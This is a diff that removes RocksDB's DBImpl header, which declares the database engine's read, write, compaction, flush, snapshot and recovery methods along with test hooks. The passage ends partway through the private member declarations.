-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-#pragma once
-
-#include <atomic>
-#include <deque>
-#include <functional>
-#include <limits>
-#include <list>
-#include <map>
-#include <queue>
-#include <set>
-#include <string>
-#include <utility>
-#include <vector>
-
-#include "db/column_family.h"
-#include "db/compaction_job.h"
-#include "db/dbformat.h"
-#include "db/external_sst_file_ingestion_job.h"
-#include "db/flush_job.h"
-#include "db/flush_scheduler.h"
-#include "db/internal_stats.h"
-#include "db/log_writer.h"
-#include "db/snapshot_impl.h"
-#include "db/version_edit.h"
-#include "db/wal_manager.h"
-#include "db/write_controller.h"
-#include "db/write_thread.h"
-#include "memtable_list.h"
-#include "monitoring/instrumented_mutex.h"
-#include "options/db_options.h"
-#include "port/port.h"
-#include "rocksdb/db.h"
-#include "rocksdb/env.h"
-#include "rocksdb/memtablerep.h"
-#include "rocksdb/status.h"
-#include "rocksdb/transaction_log.h"
-#include "rocksdb/write_buffer_manager.h"
-#include "table/scoped_arena_iterator.h"
-#include "util/autovector.h"
-#include "util/event_logger.h"
-#include "util/hash.h"
-#include "util/stop_watch.h"
-#include "util/thread_local.h"
-
-namespace rocksdb {
-
-class ArenaWrappedDBIter;
-class MemTable;
-class TableCache;
-class Version;
-class VersionEdit;
-class VersionSet;
-class Arena;
-class WriteCallback;
-struct JobContext;
-struct ExternalSstFileInfo;
-struct MemTableInfo;
-
-class DBImpl : public DB {
- public:
-  DBImpl(const DBOptions& options, const std::string& dbname);
-  virtual ~DBImpl();
-
-  // Implementations of the DB interface
-  using DB::Put;
-  virtual Status Put(const WriteOptions& options,
-                     ColumnFamilyHandle* column_family, const Slice& key,
-                     const Slice& value) override;
-  using DB::Merge;
-  virtual Status Merge(const WriteOptions& options,
-                       ColumnFamilyHandle* column_family, const Slice& key,
-                       const Slice& value) override;
-  using DB::Delete;
-  virtual Status Delete(const WriteOptions& options,
-                        ColumnFamilyHandle* column_family,
-                        const Slice& key) override;
-  using DB::SingleDelete;
-  virtual Status SingleDelete(const WriteOptions& options,
-                              ColumnFamilyHandle* column_family,
-                              const Slice& key) override;
-  using DB::Write;
-  virtual Status Write(const WriteOptions& options,
-                       WriteBatch* updates) override;
-
-  using DB::Get;
-  virtual Status Get(const ReadOptions& options,
-                     ColumnFamilyHandle* column_family, const Slice& key,
-                     PinnableSlice* value) override;
-
-  // Function that Get and KeyMayExist call with no_io true or false
-  // Note: 'value_found' from KeyMayExist propagates here
-  Status GetImpl(const ReadOptions& options, ColumnFamilyHandle* column_family,
-                 const Slice& key, PinnableSlice* value,
-                 bool* value_found = nullptr, bool* is_blob_index = nullptr);
-
-  using DB::MultiGet;
-  virtual std::vector<Status> MultiGet(
-      const ReadOptions& options,
-      const std::vector<ColumnFamilyHandle*>& column_family,
-      const std::vector<Slice>& keys,
-      std::vector<std::string>* values) override;
-
-  virtual Status CreateColumnFamily(const ColumnFamilyOptions& cf_options,
-                                    const std::string& column_family,
-                                    ColumnFamilyHandle** handle) override;
-  virtual Status CreateColumnFamilies(
-      const ColumnFamilyOptions& cf_options,
-      const std::vector<std::string>& column_family_names,
-      std::vector<ColumnFamilyHandle*>* handles) override;
-  virtual Status CreateColumnFamilies(
-      const std::vector<ColumnFamilyDescriptor>& column_families,
-      std::vector<ColumnFamilyHandle*>* handles) override;
-  virtual Status DropColumnFamily(ColumnFamilyHandle* column_family) override;
-  virtual Status DropColumnFamilies(
-      const std::vector<ColumnFamilyHandle*>& column_families) override;
-
-  // Returns false if key doesn't exist in the database and true if it may.
-  // If value_found is not passed in as null, then return the value if found in
-  // memory. On return, if value was found, then value_found will be set to true
-  // , otherwise false.
-  using DB::KeyMayExist;
-  virtual bool KeyMayExist(const ReadOptions& options,
-                           ColumnFamilyHandle* column_family, const Slice& key,
-                           std::string* value,
-                           bool* value_found = nullptr) override;
-
-  using DB::NewIterator;
-  virtual Iterator* NewIterator(const ReadOptions& options,
-                                ColumnFamilyHandle* column_family) override;
-  virtual Status NewIterators(
-      const ReadOptions& options,
-      const std::vector<ColumnFamilyHandle*>& column_families,
-      std::vector<Iterator*>* iterators) override;
-  ArenaWrappedDBIter* NewIteratorImpl(const ReadOptions& options,
-                                      ColumnFamilyData* cfd,
-                                      SequenceNumber snapshot,
-                                      bool allow_blob = false);
-
-  virtual const Snapshot* GetSnapshot() override;
-  virtual void ReleaseSnapshot(const Snapshot* snapshot) override;
-  using DB::GetProperty;
-  virtual bool GetProperty(ColumnFamilyHandle* column_family,
-                           const Slice& property, std::string* value) override;
-  using DB::GetMapProperty;
-  virtual bool GetMapProperty(ColumnFamilyHandle* column_family,
-                              const Slice& property,
-                              std::map<std::string, double>* value) override;
-  using DB::GetIntProperty;
-  virtual bool GetIntProperty(ColumnFamilyHandle* column_family,
-                              const Slice& property, uint64_t* value) override;
-  using DB::GetAggregatedIntProperty;
-  virtual bool GetAggregatedIntProperty(const Slice& property,
-                                        uint64_t* aggregated_value) override;
-  using DB::GetApproximateSizes;
-  virtual void GetApproximateSizes(ColumnFamilyHandle* column_family,
-                                   const Range* range, int n, uint64_t* sizes,
-                                   uint8_t include_flags
-                                   = INCLUDE_FILES) override;
-  using DB::GetApproximateMemTableStats;
-  virtual void GetApproximateMemTableStats(ColumnFamilyHandle* column_family,
-                                           const Range& range,
-                                           uint64_t* const count,
-                                           uint64_t* const size) override;
-  using DB::CompactRange;
-  virtual Status CompactRange(const CompactRangeOptions& options,
-                              ColumnFamilyHandle* column_family,
-                              const Slice* begin, const Slice* end) override;
-
-  using DB::CompactFiles;
-  virtual Status CompactFiles(const CompactionOptions& compact_options,
-                              ColumnFamilyHandle* column_family,
-                              const std::vector<std::string>& input_file_names,
-                              const int output_level,
-                              const int output_path_id = -1) override;
-
-  virtual Status PauseBackgroundWork() override;
-  virtual Status ContinueBackgroundWork() override;
-
-  virtual Status EnableAutoCompaction(
-      const std::vector<ColumnFamilyHandle*>& column_family_handles) override;
-
-  using DB::SetOptions;
-  Status SetOptions(
-      ColumnFamilyHandle* column_family,
-      const std::unordered_map<std::string, std::string>& options_map) override;
-
-  virtual Status SetDBOptions(
-      const std::unordered_map<std::string, std::string>& options_map) override;
-
-  using DB::NumberLevels;
-  virtual int NumberLevels(ColumnFamilyHandle* column_family) override;
-  using DB::MaxMemCompactionLevel;
-  virtual int MaxMemCompactionLevel(ColumnFamilyHandle* column_family) override;
-  using DB::Level0StopWriteTrigger;
-  virtual int Level0StopWriteTrigger(
-      ColumnFamilyHandle* column_family) override;
-  virtual const std::string& GetName() const override;
-  virtual Env* GetEnv() const override;
-  using DB::GetOptions;
-  virtual Options GetOptions(ColumnFamilyHandle* column_family) const override;
-  using DB::GetDBOptions;
-  virtual DBOptions GetDBOptions() const override;
-  using DB::Flush;
-  virtual Status Flush(const FlushOptions& options,
-                       ColumnFamilyHandle* column_family) override;
-  virtual Status FlushWAL(bool sync) override;
-  virtual Status SyncWAL() override;
-
-  virtual SequenceNumber GetLatestSequenceNumber() const override;
-
-  // Whether there is an active snapshot in range [lower_bound, upper_bound).
-  bool HasActiveSnapshotInRange(SequenceNumber lower_bound,
-                                SequenceNumber upper_bound);
-
-#ifndef ROCKSDB_LITE
-  using DB::ResetStats;
-  virtual Status ResetStats() override;
-  virtual Status DisableFileDeletions() override;
-  virtual Status EnableFileDeletions(bool force) override;
-  virtual int IsFileDeletionsEnabled() const;
-  // All the returned filenames start with "/"
-  virtual Status GetLiveFiles(std::vector<std::string>&,
-                              uint64_t* manifest_file_size,
-                              bool flush_memtable = true) override;
-  virtual Status GetSortedWalFiles(VectorLogPtr& files) override;
-
-  virtual Status GetUpdatesSince(
-      SequenceNumber seq_number, unique_ptr<TransactionLogIterator>* iter,
-      const TransactionLogIterator::ReadOptions&
-          read_options = TransactionLogIterator::ReadOptions()) override;
-  virtual Status DeleteFile(std::string name) override;
-  Status DeleteFilesInRange(ColumnFamilyHandle* column_family,
-                            const Slice* begin, const Slice* end);
-
-  virtual void GetLiveFilesMetaData(
-      std::vector<LiveFileMetaData>* metadata) override;
-
-  // Obtains the meta data of the specified column family of the DB.
-  // Status::NotFound() will be returned if the current DB does not have
-  // any column family match the specified name.
-  // TODO(yhchiang): output parameter is placed in the end in this codebase.
-  virtual void GetColumnFamilyMetaData(
-      ColumnFamilyHandle* column_family,
-      ColumnFamilyMetaData* metadata) override;
-
-  Status SuggestCompactRange(ColumnFamilyHandle* column_family,
-                             const Slice* begin, const Slice* end) override;
-
-  Status PromoteL0(ColumnFamilyHandle* column_family,
-                   int target_level) override;
-
-  // Similar to Write() but will call the callback once on the single write
-  // thread to determine whether it is safe to perform the write.
-  virtual Status WriteWithCallback(const WriteOptions& write_options,
-                                   WriteBatch* my_batch,
-                                   WriteCallback* callback);
-
-  // Returns the sequence number that is guaranteed to be smaller than or equal
-  // to the sequence number of any key that could be inserted into the current
-  // memtables. It can then be assumed that any write with a larger(or equal)
-  // sequence number will be present in this memtable or a later memtable.
-  //
-  // If the earliest sequence number could not be determined,
-  // kMaxSequenceNumber will be returned.
-  //
-  // If include_history=true, will also search Memtables in MemTableList
-  // History.
-  SequenceNumber GetEarliestMemTableSequenceNumber(SuperVersion* sv,
-                                                   bool include_history);
-
-  // For a given key, check to see if there are any records for this key
-  // in the memtables, including memtable history.  If cache_only is false,
-  // SST files will also be checked.
-  //
-  // If a key is found, *found_record_for_key will be set to true and
-  // *seq will be set to the stored sequence number for the latest
-  // operation on this key or kMaxSequenceNumber if unknown.
-  // If no key is found, *found_record_for_key will be set to false.
-  //
-  // Note: If cache_only=false, it is possible for *seq to be set to 0 if
-  // the sequence number has been cleared from the record.  If the caller is
-  // holding an active db snapshot, we know the missing sequence must be less
-  // than the snapshot's sequence number (sequence numbers are only cleared
-  // when there are no earlier active snapshots).
-  //
-  // If NotFound is returned and found_record_for_key is set to false, then no
-  // record for this key was found.  If the caller is holding an active db
-  // snapshot, we know that no key could have existing after this snapshot
-  // (since we do not compact keys that have an earlier snapshot).
-  //
-  // Returns OK or NotFound on success,
-  // other status on unexpected error.
-  // TODO(andrewkr): this API need to be aware of range deletion operations
-  Status GetLatestSequenceForKey(SuperVersion* sv, const Slice& key,
-                                 bool cache_only, SequenceNumber* seq,
-                                 bool* found_record_for_key,
-                                 bool* is_blob_index = nullptr);
-
-  using DB::IngestExternalFile;
-  virtual Status IngestExternalFile(
-      ColumnFamilyHandle* column_family,
-      const std::vector<std::string>& external_files,
-      const IngestExternalFileOptions& ingestion_options) override;
-
-  virtual Status VerifyChecksum() override;
-
-#endif  // ROCKSDB_LITE
-
-  // Similar to GetSnapshot(), but also lets the db know that this snapshot
-  // will be used for transaction write-conflict checking.  The DB can then
-  // make sure not to compact any keys that would prevent a write-conflict from
-  // being detected.
-  const Snapshot* GetSnapshotForWriteConflictBoundary();
-
-  // checks if all live files exist on file system and that their file sizes
-  // match to our in-memory records
-  virtual Status CheckConsistency();
-
-  virtual Status GetDbIdentity(std::string& identity) const override;
-
-  Status RunManualCompaction(ColumnFamilyData* cfd, int input_level,
-                             int output_level, uint32_t output_path_id,
-                             const Slice* begin, const Slice* end,
-                             bool exclusive,
-                             bool disallow_trivial_move = false);
-
-  // Return an internal iterator over the current state of the database.
-  // The keys of this iterator are internal keys (see format.h).
-  // The returned iterator should be deleted when no longer needed.
-  InternalIterator* NewInternalIterator(
-      Arena* arena, RangeDelAggregator* range_del_agg,
-      ColumnFamilyHandle* column_family = nullptr);
-
-#ifndef NDEBUG
-  // Extra methods (for testing) that are not in the public DB interface
-  // Implemented in db_impl_debug.cc
-
-  // Compact any files in the named level that overlap [*begin, *end]
-  Status TEST_CompactRange(int level, const Slice* begin, const Slice* end,
-                           ColumnFamilyHandle* column_family = nullptr,
-                           bool disallow_trivial_move = false);
-
-  void TEST_HandleWALFull();
-
-  bool TEST_UnableToFlushOldestLog() {
-    return unable_to_flush_oldest_log_;
-  }
-
-  bool TEST_IsLogGettingFlushed() {
-    return alive_log_files_.begin()->getting_flushed;
-  }
-
-  Status TEST_SwitchMemtable(ColumnFamilyData* cfd = nullptr);
-
-  // Force current memtable contents to be flushed.
-  Status TEST_FlushMemTable(bool wait = true,
-                            ColumnFamilyHandle* cfh = nullptr);
-
-  // Wait for memtable compaction
-  Status TEST_WaitForFlushMemTable(ColumnFamilyHandle* column_family = nullptr);
-
-  // Wait for any compaction
-  Status TEST_WaitForCompact();
-
-  // Return the maximum overlapping data (in bytes) at next level for any
-  // file at a level >= 1.
-  int64_t TEST_MaxNextLevelOverlappingBytes(ColumnFamilyHandle* column_family =
-                                                nullptr);
-
-  // Return the current manifest file no.
-  uint64_t TEST_Current_Manifest_FileNo();
-
-  // get total level0 file size. Only for testing.
-  uint64_t TEST_GetLevel0TotalSize();
-
-  void TEST_GetFilesMetaData(ColumnFamilyHandle* column_family,
-                             std::vector<std::vector<FileMetaData>>* metadata);
-
-  void TEST_LockMutex();
-
-  void TEST_UnlockMutex();
-
-  // REQUIRES: mutex locked
-  void* TEST_BeginWrite();
-
-  // REQUIRES: mutex locked
-  // pass the pointer that you got from TEST_BeginWrite()
-  void TEST_EndWrite(void* w);
-
-  uint64_t TEST_MaxTotalInMemoryState() const {
-    return max_total_in_memory_state_;
-  }
-
-  size_t TEST_LogsToFreeSize();
-
-  uint64_t TEST_LogfileNumber();
-
-  uint64_t TEST_total_log_size() const { return total_log_size_; }
-
-  // Returns column family name to ImmutableCFOptions map.
-  Status TEST_GetAllImmutableCFOptions(
-      std::unordered_map<std::string, const ImmutableCFOptions*>* iopts_map);
-
-  // Return the lastest MutableCFOptions of a column family
-  Status TEST_GetLatestMutableCFOptions(ColumnFamilyHandle* column_family,
-                                        MutableCFOptions* mutable_cf_options);
-
-  Cache* TEST_table_cache() { return table_cache_.get(); }
-
-  WriteController& TEST_write_controler() { return write_controller_; }
-
-  uint64_t TEST_FindMinLogContainingOutstandingPrep();
-  uint64_t TEST_FindMinPrepLogReferencedByMemTable();
-
-  int TEST_BGCompactionsAllowed() const;
-  int TEST_BGFlushesAllowed() const;
-
-#endif  // NDEBUG
-
-  struct BGJobLimits {
-    int max_flushes;
-    int max_compactions;
-  };
-  // Returns maximum background flushes and compactions allowed to be scheduled
-  BGJobLimits GetBGJobLimits() const;
-  // Need a static version that can be called during SanitizeOptions().
-  static BGJobLimits GetBGJobLimits(int max_background_flushes,
-                                    int max_background_compactions,
-                                    int max_background_jobs,
-                                    bool parallelize_compactions);
-
-  // move logs pending closing from job_context to the DB queue and
-  // schedule a purge
-  void ScheduleBgLogWriterClose(JobContext* job_context);
-
-  uint64_t MinLogNumberToKeep();
-
-  // Returns the list of live files in 'live' and the list
-  // of all files in the filesystem in 'candidate_files'.
-  // If force == false and the last call was less than
-  // db_options_.delete_obsolete_files_period_micros microseconds ago,
-  // it will not fill up the job_context
-  void FindObsoleteFiles(JobContext* job_context, bool force,
-                         bool no_full_scan = false);
-
-  // Diffs the files listed in filenames and those that do not
-  // belong to live files are posibly removed. Also, removes all the
-  // files in sst_delete_files and log_delete_files.
-  // It is not necessary to hold the mutex when invoking this method.
-  void PurgeObsoleteFiles(const JobContext& background_contet,
-                          bool schedule_only = false);
-
-  void SchedulePurge();
-
-  ColumnFamilyHandle* DefaultColumnFamily() const override;
-
-  const SnapshotList& snapshots() const { return snapshots_; }
-
-  const ImmutableDBOptions& immutable_db_options() const {
-    return immutable_db_options_;
-  }
-
-  void CancelAllBackgroundWork(bool wait);
-
-  // Find Super version and reference it. Based on options, it might return
-  // the thread local cached one.
-  // Call ReturnAndCleanupSuperVersion() when it is no longer needed.
-  SuperVersion* GetAndRefSuperVersion(ColumnFamilyData* cfd);
-
-  // Similar to the previous function but looks up based on a column family id.
-  // nullptr will be returned if this column family no longer exists.
-  // REQUIRED: this function should only be called on the write thread or if the
-  // mutex is held.
-  SuperVersion* GetAndRefSuperVersion(uint32_t column_family_id);
-
-  // Un-reference the super version and return it to thread local cache if
-  // needed. If it is the last reference of the super version. Clean it up
-  // after un-referencing it.
-  void ReturnAndCleanupSuperVersion(ColumnFamilyData* cfd, SuperVersion* sv);
-
-  // Similar to the previous function but looks up based on a column family id.
-  // nullptr will be returned if this column family no longer exists.
-  // REQUIRED: this function should only be called on the write thread.
-  void ReturnAndCleanupSuperVersion(uint32_t colun_family_id, SuperVersion* sv);
-
-  // REQUIRED: this function should only be called on the write thread or if the
-  // mutex is held.  Return value only valid until next call to this function or
-  // mutex is released.
-  ColumnFamilyHandle* GetColumnFamilyHandle(uint32_t column_family_id);
-
-  // Same as above, should called without mutex held and not on write thread.
-  ColumnFamilyHandle* GetColumnFamilyHandleUnlocked(uint32_t column_family_id);
-
-  // Returns the number of currently running flushes.
-  // REQUIREMENT: mutex_ must be held when calling this function.
-  int num_running_flushes() {
-    mutex_.AssertHeld();
-    return num_running_flushes_;
-  }
-
-  // Returns the number of currently running compactions.
-  // REQUIREMENT: mutex_ must be held when calling this function.
-  int num_running_compactions() {
-    mutex_.AssertHeld();
-    return num_running_compactions_;
-  }
-
-  const WriteController& write_controller() { return write_controller_; }
-
-  InternalIterator* NewInternalIterator(const ReadOptions&,
-                                        ColumnFamilyData* cfd,
-                                        SuperVersion* super_version,
-                                        Arena* arena,
-                                        RangeDelAggregator* range_del_agg);
-
-  // hollow transactions shell used for recovery.
-  // these will then be passed to TransactionDB so that
-  // locks can be reacquired before writing can resume.
-  struct RecoveredTransaction {
-    uint64_t log_number_;
-    std::string name_;
-    WriteBatch* batch_;
-    explicit RecoveredTransaction(const uint64_t log, const std::string& name,
-                                  WriteBatch* batch)
-        : log_number_(log), name_(name), batch_(batch) {}
-
-    ~RecoveredTransaction() { delete batch_; }
-  };
-
-  bool allow_2pc() const { return immutable_db_options_.allow_2pc; }
-
-  std::unordered_map<std::string, RecoveredTransaction*>
-  recovered_transactions() {
-    return recovered_transactions_;
-  }
-
-  RecoveredTransaction* GetRecoveredTransaction(const std::string& name) {
-    auto it = recovered_transactions_.find(name);
-    if (it == recovered_transactions_.end()) {
-      return nullptr;
-    } else {
-      return it->second;
-    }
-  }
-
-  void InsertRecoveredTransaction(const uint64_t log, const std::string& name,
-                                  WriteBatch* batch) {
-    recovered_transactions_[name] = new RecoveredTransaction(log, name, batch);
-    MarkLogAsContainingPrepSection(log);
-  }
-
-  void DeleteRecoveredTransaction(const std::string& name) {
-    auto it = recovered_transactions_.find(name);
-    assert(it != recovered_transactions_.end());
-    auto* trx = it->second;
-    recovered_transactions_.erase(it);
-    MarkLogAsHavingPrepSectionFlushed(trx->log_number_);
-    delete trx;
-  }
-
-  void DeleteAllRecoveredTransactions() {
-    for (auto it = recovered_transactions_.begin();
-         it != recovered_transactions_.end(); it++) {
-      delete it->second;
-    }
-    recovered_transactions_.clear();
-  }
-
-  void MarkLogAsHavingPrepSectionFlushed(uint64_t log);
-  void MarkLogAsContainingPrepSection(uint64_t log);
-  void AddToLogsToFreeQueue(log::Writer* log_writer) {
-    logs_to_free_queue_.push_back(log_writer);
-  }
-  InstrumentedMutex* mutex() { return &mutex_; }
-
-  Status NewDB();
-
- protected:
-  Env* const env_;
-  const std::string dbname_;
-  unique_ptr<VersionSet> versions_;
-  const DBOptions initial_db_options_;
-  const ImmutableDBOptions immutable_db_options_;
-  MutableDBOptions mutable_db_options_;
-  Statistics* stats_;
-  std::unordered_map<std::string, RecoveredTransaction*>
-      recovered_transactions_;
-
-  // Except in DB::Open(), WriteOptionsFile can only be called when:
-  // Persist options to options file.
-  // If need_mutex_lock = false, the method will lock DB mutex.
-  // If need_enter_write_thread = false, the method will enter write thread.
-  Status WriteOptionsFile(bool need_mutex_lock, bool need_enter_write_thread);
-
-  // The following two functions can only be called when:
-  // 1. WriteThread::Writer::EnterUnbatched() is used.
-  // 2. db_mutex is NOT held
-  Status RenameTempFileToOptionsFile(const std::string& file_name);
-  Status DeleteObsoleteOptionsFiles();
-
-  void NotifyOnFlushBegin(ColumnFamilyData* cfd, FileMetaData* file_meta,
-                          const MutableCFOptions& mutable_cf_options,
-                          int job_id, TableProperties prop);
-
-  void NotifyOnFlushCompleted(ColumnFamilyData* cfd, FileMetaData* file_meta,
-                              const MutableCFOptions& mutable_cf_options,
-                              int job_id, TableProperties prop);
-
-  void NotifyOnCompactionCompleted(ColumnFamilyData* cfd,
-                                   Compaction *c, const Status &st,
-                                   const CompactionJobStats& job_stats,
-                                   int job_id);
-  void NotifyOnMemTableSealed(ColumnFamilyData* cfd,
-                              const MemTableInfo& mem_table_info);
-
-#ifndef ROCKSDB_LITE
-  void NotifyOnExternalFileIngested(
-      ColumnFamilyData* cfd, const ExternalSstFileIngestionJob& ingestion_job);
-#endif  // !ROCKSDB_LITE
-
-  void NewThreadStatusCfInfo(ColumnFamilyData* cfd) const;
-
-  void EraseThreadStatusCfInfo(ColumnFamilyData* cfd) const;
-
-  void EraseThreadStatusDbInfo() const;
-
-  Status WriteImpl(const WriteOptions& options, WriteBatch* updates,
-                   WriteCallback* callback = nullptr,
-                   uint64_t* log_used = nullptr, uint64_t log_ref = 0,
-                   bool disable_memtable = false, uint64_t* seq_used = nullptr);
-
-  Status PipelinedWriteImpl(const WriteOptions& options, WriteBatch* updates,
-                            WriteCallback* callback = nullptr,
-                            uint64_t* log_used = nullptr, uint64_t log_ref = 0,
-                            bool disable_memtable = false,
-                            uint64_t* seq_used = nullptr);
-
-  Status WriteImplWALOnly(const WriteOptions& options, WriteBatch* updates,
-                          WriteCallback* callback = nullptr,
-                          uint64_t* log_used = nullptr, uint64_t log_ref = 0,
-                          uint64_t* seq_used = nullptr);
-
-  uint64_t FindMinLogContainingOutstandingPrep();
-  uint64_t FindMinPrepLogReferencedByMemTable();
-
- private:
-  friend class DB;
-  friend class InternalStats;
-  friend class PessimisticTransaction;
-  friend class WriteCommittedTxn;
-  friend class WritePreparedTxn;
-#ifndef ROCKSDB_LITE
-  friend class ForwardIterator;
-#endif
-  friend struct SuperVersion;
-  friend class CompactedDBImpl;
-#ifndef NDEBUG
-  friend class DBTest2_ReadCallbackTest_Test;
-  friend class XFTransactionWriteHandler;
-  friend class DBBlobIndexTest;
-#endif
-  struct CompactionState;
-
-  struct WriteContext {
-    autovector<SuperVersion*> superversions_to_free_;
-    autovector<MemTable*> memtables_to_free_;
-
-    ~WriteContext() {
-      for (auto& sv : superversions_to_free_) {
-        delete sv;
-      }
-      for (auto& m : memtables_to_free_) {
-        delete m;
-      }
-    }
-  };
-
-  struct PrepickedCompaction;
-  struct PurgeFileInfo;
-
-  // Recover the descriptor from persistent storage.  May do a significant
-  // amount of work to recover recently logged updates.  Any changes to
-  // be made to the descriptor are added to *edit.
-  Status Recover(const std::vector<ColumnFamilyDescriptor>& column_families,
-                 bool read_only = false, bool error_if_log_file_exist = false,
-                 bool error_if_data_exists_in_logs = false);
-
-  void MaybeIgnoreError(Status* s) const;
-
-  const Status CreateArchivalDirectory();
-
-  Status CreateColumnFamilyImpl(const ColumnFamilyOptions& cf_options,
-                                const std::string& cf_name,
-                                ColumnFamilyHandle** handle);
-
-  Status DropColumnFamilyImpl(ColumnFamilyHandle* column_family);
-
-  // Delete any unneeded files and stale in-memory entries.
-  void DeleteObsoleteFiles();
-  // Delete obsolete files and log status and information of file deletion
-  void DeleteObsoleteFileImpl(Status file_deletion_status, int job_id,
-                              const std::string& fname, FileType type,
-                              uint64_t number, uint32_t path_id);
-
-  // Background process needs to call
-  //     auto x = CaptureCurrentFileNumberInPendingOutputs()
-  //     auto file_num = versions_->NewFileNumber();
-  //     <do something>
-  //     ReleaseFileNumberFromPendingOutputs(x)
-  // This will protect any file with number `file_num` or greater from being
-  // deleted while <do something> is running.
-  // -----------
-  // This function will capture current file number and append it to
-  // pending_outputs_. This will prevent any background process to delete any
-  // file created after this point.
-  std::list<uint64_t>::iterator CaptureCurrentFileNumberInPendingOutputs();
-  // This function should be called with the result of
-  // CaptureCurrentFileNumberInPendingOutputs(). It then marks that any file
-  // created between the calls CaptureCurrentFileNumberInPendingOutputs() and
-  // ReleaseFileNumberFromPendingOutputs() can now be deleted (if it's not live
-  // and blocked by any other pending_outputs_ calls)
-  void ReleaseFileNumberFromPendingOutputs(std::list<uint64_t>::iterator v);
-
-  Status SyncClosedLogs(JobContext* job_context);
-
-  // Flush the in-memory write buffer to storage.  Switches to a new
-  // log-file/memtable and writes a new descriptor iff successful.
-  Status FlushMemTableToOutputFile(ColumnFamilyData* cfd,
-                                   const MutableCFOptions& mutable_cf_options,
-                                   bool* madeProgress, JobContext* job_context,
-                                   LogBuffer* log_buffer);
-
-  // REQUIRES: log_numbers are sorted in ascending order
-  Status RecoverLogFiles(const std::vector<uint64_t>& log_numbers,
-                         SequenceNumber* next_sequence, bool read_only);
-
-  // The following two methods are used to flush a memtable to
-  // storage. The first one is used at database RecoveryTime (when the
-  // database is opened) and is heavyweight because it holds the mutex
-  // for the entire period. The second method WriteLevel0Table supports
-  // concurrent flush memtables to storage.
-  Status WriteLevel0TableForRecovery(int job_id, ColumnFamilyData* cfd,
-                                     MemTable* mem, VersionEdit* edit);
-
-  // num_bytes: for slowdown case, delay time is calculated based on
-  //            `num_bytes` going through.
-  Status DelayWrite(uint64_t num_bytes, const WriteOptions& write_options);
-
-  Status ThrottleLowPriWritesIfNeeded(const WriteOptions& write_options,
-                                      WriteBatch* my_batch);
-
-  Status ScheduleFlushes(WriteContext* context);
-
-  Status SwitchMemtable(ColumnFamilyData* cfd, WriteContext* context);
-
-  // Force current memtable contents to be flushed.
-  Status FlushMemTable(ColumnFamilyData* cfd, const FlushOptions& options,
-                       bool writes_stopped = false);
-
-  // Wait for memtable flushed
-  Status WaitForFlushMemTable(ColumnFamilyData* cfd);
-
-  // REQUIRES: mutex locked
-  Status HandleWALFull(WriteContext* write_context);
-
-  // REQUIRES: mutex locked
-  Status HandleWriteBufferFull(WriteContext* write_context);
-
-  // REQUIRES: mutex locked
-  Status PreprocessWrite(const WriteOptions& write_options, bool* need_log_sync,
-                         WriteContext* write_context);
-
-  WriteBatch* MergeBatch(const WriteThread::WriteGroup& write_group,
-                         WriteBatch* tmp_batch, size_t* write_with_wal);
-
-  Status WriteToWAL(const WriteBatch& merged_batch, log::Writer* log_writer,
-                    uint64_t* log_used, uint64_t* log_size);
-
-  Status WriteToWAL(const WriteThread::WriteGroup& write_group,
-                    log::Writer* log_writer, uint64_t* log_used,
-                    bool need_log_sync, bool need_log_dir_sync,
-                    SequenceNumber sequence);
-
-  Status ConcurrentWriteToWAL(const WriteThread::WriteGroup& write_group,
-                              uint64_t* log_used, SequenceNumber* last_sequence,
-                              int total_count);
-
-  // Used by WriteImpl to update bg_error_ if paranoid check is enabled.
-  void WriteCallbackStatusCheck(const Status& status);
-
-  // Used by WriteImpl to update bg_error_ in case of memtable insert error.
-  void MemTableInsertStatusCheck(const Status& memtable_insert_status);
-
-#ifndef ROCKSDB_LITE
-
-  Status CompactFilesImpl(const CompactionOptions& compact_options,
-                          ColumnFamilyData* cfd, Version* version,
-                          const std::vector<std::string>& input_file_names,
-                          const int output_level, int output_path_id,
-                          JobContext* job_context, LogBuffer* log_buffer);
-
-  // Wait for current IngestExternalFile() calls to finish.
-  // REQUIRES: mutex_ held
-  void WaitForIngestFile();
-
-#else
-  // IngestExternalFile is not supported in ROCKSDB_LITE so this function
-  // will be no-op
-  void WaitForIngestFile() {}
-#endif  // ROCKSDB_LITE
-
-  ColumnFamilyData* GetColumnFamilyDataByName(const std::string& cf_name);
-
-  void MaybeScheduleFlushOrCompaction();
-  void SchedulePendingFlush(ColumnFamilyData* cfd);
-  void SchedulePendingCompaction(ColumnFamilyData* cfd);
-  void SchedulePendingPurge(std::string fname, FileType type, uint64_t number,
-                            uint32_t path_id, int job_id);
-  static void BGWorkCompaction(void* arg);
-  // Runs a pre-chosen universal compaction involving bottom level in a
-  // separate, bottom-pri thread pool.
-  static void BGWorkBottomCompaction(void* arg);
-  static void BGWorkFlush(void* db);
-  static void BGWorkPurge(void* arg);
-  static void UnscheduleCallback(void* arg);
-  void BackgroundCallCompaction(PrepickedCompaction* prepicked_compaction,
-                                Env::Priority bg_thread_pri);
-  void BackgroundCallFlush();
-  void BackgroundCallPurge();
-  Status BackgroundCompaction(bool* madeProgress, JobContext* job_context,
-                              LogBuffer* log_buffer,
-                              PrepickedCompaction* prepicked_compaction);
-  Status BackgroundFlush(bool* madeProgress, JobContext* job_context,
-                         LogBuffer* log_buffer);
-
-  void PrintStatistics();
-
-  // dump rocksdb.stats to LOG
-  void MaybeDumpStats();
-
-  // Return the minimum empty level that could hold the total data in the
-  // input level. Return the input level, if such level could not be found.
-  int FindMinimumEmptyLevelFitting(ColumnFamilyData* cfd,
-      const MutableCFOptions& mutable_cf_options, int level);
-
-  // Move the files in the input level to the target level.
-  // If target_level < 0, automatically calculate the minimum level that could
-  // hold the data set.
-  Status ReFitLevel(ColumnFamilyData* cfd, int level, int target_level = -1);
-
-  // helper functions for adding and removing from flush & compaction queues
-  void AddToCompactionQueue(ColumnFamilyData* cfd);
-  ColumnFamilyData* PopFirstFromCompactionQueue();
-  void AddToFlushQueue(ColumnFamilyData* cfd);
-  ColumnFamilyData* PopFirstFromFlushQueue();
-
-  // helper function to call after some of the logs_ were synced
-  void MarkLogsSynced(uint64_t up_to, bool synced_dir, const Status& status);
-
-  const Snapshot* GetSnapshotImpl(bool is_write_conflict_boundary);
-
-  uint64_t GetMaxTotalWalSize() const;
-
-  // table_cache_ provides its own synchronization
-  std::shared_ptr<Cache> table_cache_;
-
-  // Lock over the persistent DB state.  Non-nullptr iff successfully acquired.
